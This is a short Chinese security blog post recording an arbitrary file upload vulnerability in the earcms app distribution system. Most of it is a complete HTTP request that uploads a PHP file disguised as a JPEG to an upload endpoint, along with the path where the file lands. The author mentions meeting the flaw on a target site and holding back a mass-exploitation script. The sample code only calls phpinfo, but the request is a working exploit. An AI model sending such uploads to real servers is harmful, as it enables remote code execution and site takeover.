earcms分发系统任意上传漏洞


很久之前就研究过这个洞 到现在都忘了 今天在目标站遇见了就记录下来吧

Payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /source/pack/upload/index-uplog.php HTTP/1.1
Host: 127.0.0.1
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWa8hDK6XlSEJhi7
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 322

------WebKitFormBoundaryZWa8hDK6XlSEJhi7
Content-Disposition: form-data; name="app"; filename="funny.php"
Content-Type: image/jpeg

<?php phpinfo();;unlink(__FILE__);?>
------WebKitFormBoundaryZWa8hDK6XlSEJhi7
Content-Disposition: form-data; name="time"

test //这是文件名
------WebKitFormBoundaryZWa8hDK6XlSEJhi7--

go后会在 /data/tmp/ 下生成 test.php 文件

批量脚本就不放了 有兴趣可以一起进星球交流

------ 本文结束 ------

本文标题:earcms分发系统任意上传漏洞

文章作者:Funny

发布时间:2020年06月26日 - 13:06

最后更新:2020年06月26日 - 13:06

原始链接:http://www.safeinfo.me/2020/06/26/earcms分发系统任意上传漏洞.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

Funny wechat
扫一扫,加入信安圈。
0%